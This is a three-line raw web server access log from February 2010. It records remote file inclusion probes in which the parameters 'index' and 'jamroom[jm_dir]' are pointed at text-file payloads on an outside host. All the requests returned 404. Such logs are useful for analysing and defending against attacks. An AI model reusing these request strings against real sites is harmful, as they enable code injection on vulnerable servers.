219.94.193.152 - - [25/Feb/2010:07:19:05 -0800] "GET /home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [25/Feb/2010:07:19:05 -0800] "GET /logs/home.php?index=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:07:19:21 -0800] "GET /logs/access_100208.log%20%20//jrBrowser/purchase.php?jamroom[jm_dir]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
